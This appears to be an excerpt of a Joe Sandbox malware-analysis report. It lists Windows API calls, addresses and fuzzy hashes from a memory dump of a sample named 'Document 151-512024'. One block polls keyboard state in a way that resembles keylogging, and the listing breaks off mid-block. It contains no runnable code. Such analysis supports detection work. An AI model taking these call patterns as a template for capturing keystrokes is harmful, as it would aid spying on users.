                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009D3AA0
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D3AC7
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D3AEA
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009D3B62
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009D3BAC
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009D3BC7
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009D3BE2
                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009D3BF6
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009D3C13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 312131281-3368625520
                                                                                                    • Opcode ID: 7caa721e311f5ab458f21a45362eb920cbbcb1bec97c727258f3f5de3d7f7f06
                                                                                                    • Instruction ID: 6b503d58ed4b7de0888ff4b5e7d4b8b84e464f66cd3fd74ba3d33ee8c519cca1
                                                                                                    • Opcode Fuzzy Hash: 7caa721e311f5ab458f21a45362eb920cbbcb1bec97c727258f3f5de3d7f7f06
                                                                                                    • Instruction Fuzzy Hash: 3C617D75940208AFDB10DFA8CC81EEE77B8EF49700F10819AFA15A73A1D774AE41DB50
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009ADC20
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009ADC46
                                                                                                    • _wcslen.LIBCMT ref: 009ADC50
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 009ADCA0
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009ADCBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    • Opcode ID: df98797eb1261c93258c6f6aa6f8f912a313576684eb36fd63962655ed857304
                                                                                                    • Instruction ID: 4553512fa657191338743804e151e93c0a3c4fdbfbb6f09d3e21d2636dac9305
                                                                                                    • Opcode Fuzzy Hash: df98797eb1261c93258c6f6aa6f8f912a313576684eb36fd63962655ed857304
                                                                                                    • Instruction Fuzzy Hash: EB412472A812057AEB00A7759C07FBF77ACEF82760F10446AF901E65C2EB74D904D7A5
                                                                                                    APIs
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009CCC64
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 009CCC8D
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009CCD48
                                                                                                      • Part of subcall function 009CCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009CCCAA
                                                                                                      • Part of subcall function 009CCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 009CCCBD
                                                                                                      • Part of subcall function 009CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009CCCCF
                                                                                                      • Part of subcall function 009CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009CCD05
                                                                                                      • Part of subcall function 009CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009CCD28
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 009CCCF3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                    • Opcode ID: 432b73d6b849163905a07534d37438fe70a1250d223558908aebae2886d37a86
                                                                                                    • Instruction ID: 6127d3a6bf1f26459187e7cbbfa0a4a72251188db859eae31a34077ffb787337
                                                                                                    • Opcode Fuzzy Hash: 432b73d6b849163905a07534d37438fe70a1250d223558908aebae2886d37a86
                                                                                                    • Instruction Fuzzy Hash: 053184B1D41129BBDB208B50DC88EFFBF7CEF55740F004569E90AE2140DB345A45EAB1
                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 009AE6B4
                                                                                                      • Part of subcall function 0095E551: timeGetTime.WINMM(?,?,009AE6D4), ref: 0095E555
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 009AE6E1
                                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 009AE705
                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009AE727
                                                                                                    • SetActiveWindow.USER32 ref: 009AE746
                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009AE754
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 009AE773
                                                                                                    • Sleep.KERNEL32(000000FA), ref: 009AE77E
                                                                                                    • IsWindow.USER32 ref: 009AE78A
                                                                                                    • EndDialog.USER32(00000000), ref: 009AE79B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                    • String ID: BUTTON
                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                    • Opcode ID: 18fbbce659bde51bd025242711ae29ab3349ecc8a0025ffdd636802cf22532d9
                                                                                                    • Instruction ID: 03f1a1ae4683b8335b33f0f1e3000420bbb895f6bde4c6c97d5c94bc482d1aec
                                                                                                    • Opcode Fuzzy Hash: 18fbbce659bde51bd025242711ae29ab3349ecc8a0025ffdd636802cf22532d9
                                                                                                    • Instruction Fuzzy Hash: 4C2193B0354206AFEB009FA0EC89B653B6DF796349F108836F521821E1DB71EC51DBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009AEA5D
                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009AEA73
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009AEA84
                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009AEA96
                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009AEAA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString$_wcslen
                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                    • Opcode ID: cf0eb568d2eefda5edadcf15927a97db3fa027260d35f80e64cfabf87d36249a
                                                                                                    • Instruction ID: ce0edf5df82da339246c8d72eb7d76d3d1fb75436f462b6500669a32a5a8a6a5
                                                                                                    • Opcode Fuzzy Hash: cf0eb568d2eefda5edadcf15927a97db3fa027260d35f80e64cfabf87d36249a
                                                                                                    • Instruction Fuzzy Hash: B4115E31A9025D79E720A7A5EC4AEFF6ABCFBD2B44F444829B811A20D1EAB00955C5B0
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 009A5CE2
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009A5CFB
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009A5D59
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 009A5D69
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009A5D7B
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009A5DCF
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 009A5DDD
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009A5DEF
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009A5E31
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 009A5E44
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009A5E5A
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 009A5E67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    • Opcode ID: 3bb78978c59b2ebd860e35a067bf847d95b5921ea429fcad48e925bb265017d7
                                                                                                    • Instruction ID: 06bf150a5b0f92f3f03581f3ad44d5a8699fad87d092e8b589f750a8ea992e8a
                                                                                                    • Opcode Fuzzy Hash: 3bb78978c59b2ebd860e35a067bf847d95b5921ea429fcad48e925bb265017d7
                                                                                                    • Instruction Fuzzy Hash: 4A512EB1B50606AFDF18CF68CD89AAEBBB9FB49300F518129F515E7290D7709E40DB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009D5186
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 009D51C7
                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 009D51CD
                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 009D51D1
                                                                                                      • Part of subcall function 009D6FBA: DeleteObject.GDI32(00000000), ref: 009D6FE6
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D520D
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D521A
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009D524D
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009D5287
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009D5296
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3210457359-3368625520
                                                                                                    • Opcode ID: 5f6ab7627f76ea3b8a39171810e9d5221dc986089ed0ebad8dd27b255cb31b05
                                                                                                    • Instruction ID: e6acbe276b03ad285a4b174feb69dd3a51210b9e4b350756daafc624c69ce3c2
                                                                                                    • Opcode Fuzzy Hash: 5f6ab7627f76ea3b8a39171810e9d5221dc986089ed0ebad8dd27b255cb31b05
                                                                                                    • Instruction Fuzzy Hash: EA51AE70AD5A09BEEF209F64CC46BD83B69EB05361F15C113FA24963E0C775E988DB40
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0098F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 009A9717
                                                                                                    • LoadStringW.USER32(00000000,?,0098F7F8,00000001), ref: 009A9720
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0098F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 009A9742
                                                                                                    • LoadStringW.USER32(00000000,?,0098F7F8,00000001), ref: 009A9745
                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 009A9866
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                    • API String ID: 747408836-2268648507
                                                                                                    • Opcode ID: 1ee6a2f8a365e056f44d3adfad0de8774cb15a4e38c0b52fb8125cd8b5703293
                                                                                                    • Instruction ID: 9a72f5ce5fa86aa24770b1ff7c7d0d9d6c1b3513ebb9040e8b4a26d2bc404f53
                                                                                                    • Opcode Fuzzy Hash: 1ee6a2f8a365e056f44d3adfad0de8774cb15a4e38c0b52fb8125cd8b5703293
                                                                                                    • Instruction Fuzzy Hash: E1414D72840209AADF04EFE4DE96FEEB378AF95340F504425F60572092EB356F48CBA1
                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 009D3C79
                                                                                                    • SetMenu.USER32(?,00000000), ref: 009D3C88
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009D3D10
                                                                                                    • IsMenu.USER32(?), ref: 009D3D24
                                                                                                    • CreatePopupMenu.USER32 ref: 009D3D2E
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009D3D5B
                                                                                                    • DrawMenuBar.USER32 ref: 009D3D63
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$0n$F
                                                                                                    • API String ID: 161812096-1675433258
                                                                                                    • Opcode ID: 8bc6a72e2f70c7589c9db6af11936c0132c84c96118aa3e8053cb88c08e5273e
                                                                                                    • Instruction ID: 7cfface7a94e5314788d3c1a962bd9636cb13ef74f2de0e7546315f1248b157b
                                                                                                    • Opcode Fuzzy Hash: 8bc6a72e2f70c7589c9db6af11936c0132c84c96118aa3e8053cb88c08e5273e
                                                                                                    • Instruction Fuzzy Hash: 5C41ADB8A4520AAFDF10CF60E844EDA77BAFF49341F14802AF946973A0D730AA00DF51
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 009C3C5C
                                                                                                    • CoInitialize.OLE32(00000000), ref: 009C3C8A
                                                                                                    • CoUninitialize.OLE32 ref: 009C3C94
                                                                                                    • _wcslen.LIBCMT ref: 009C3D2D
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 009C3DB1
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 009C3ED5
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 009C3F0E
                                                                                                    • CoGetObject.OLE32(?,00000000,009DFB98,?), ref: 009C3F2D
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 009C3F40
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009C3FC4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009C3FD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    • Opcode ID: 4a85a8ff8b0f688fb7b09e4b7b26ee6634cd85a7f72da31a3d421973b1947771
                                                                                                    • Instruction ID: 9278213b8f5cbc56119ca82b5c33a86f432d789dccde1d94b964bfd4d7ad3b65
                                                                                                    • Opcode Fuzzy Hash: 4a85a8ff8b0f688fb7b09e4b7b26ee6634cd85a7f72da31a3d421973b1947771
                                                                                                    • Instruction Fuzzy Hash: 03C10371A082059FD700DF68C884E2BBBE9FF89744F10891DF98A9B251D731EE45CB52
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 009B7AF3
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009B7B8F
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 009B7BA3
                                                                                                    • CoCreateInstance.OLE32(009DFD08,00000000,00000001,00A06E6C,?), ref: 009B7BEF
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009B7C74
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 009B7CCC
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 009B7D57
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009B7D7A
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 009B7D81
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 009B7DD6
                                                                                                    • CoUninitialize.OLE32 ref: 009B7DDC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    • Opcode ID: c0200cedba633d7a6e361d610c97a1ec23537fb519d0f32065c78b6f44ea2399
                                                                                                    • Instruction ID: e27cc9e4d2a7b8fcb3a5f02e5386201da60e7ba65e20d0528027c700d802966c
                                                                                                    • Opcode Fuzzy Hash: c0200cedba633d7a6e361d610c97a1ec23537fb519d0f32065c78b6f44ea2399
                                                                                                    • Instruction Fuzzy Hash: 7FC13975A04109AFCB14DFA4C984DAEBBF9FF88314B148599F81A9B361D730EE45CB90
                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0099FAAF
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0099FB08
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0099FB1A
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0099FB3A
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0099FB8D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0099FBA1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0099FBB6
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0099FBC3
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0099FBCC
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0099FBDE
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0099FBE9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    • Opcode ID: 9e64d4a9463661bcc8e05e6087551e272d8a70ff2dc91b18d62a38cd7b482dff
                                                                                                    • Instruction ID: 6c6cdc7d0c153e5b91339dc4688254fa801389049231b60886770dddc4d40a2b
                                                                                                    • Opcode Fuzzy Hash: 9e64d4a9463661bcc8e05e6087551e272d8a70ff2dc91b18d62a38cd7b482dff
                                                                                                    • Instruction Fuzzy Hash: 78416075A1521AAFCF00DF68C864DAEBBB9FF58344F008069F945E7261DB34A945CF90
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 009A9CA1
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 009A9D22
                                                                                                    • GetKeyState.USER32(000000A0), ref: 009A9D3D
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 009A9D57
                                                                                                    • GetKeyState.USER32(000000A1), ref: 009A9D6C
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 009A9D84
                                                                                                    • GetKeyState.USER32(00000011), ref: 009A9D96
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 009A9DAE
                                                                                                    • GetKeyState.USER32(00000012), ref: 009A9DC0
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 009A9DD8
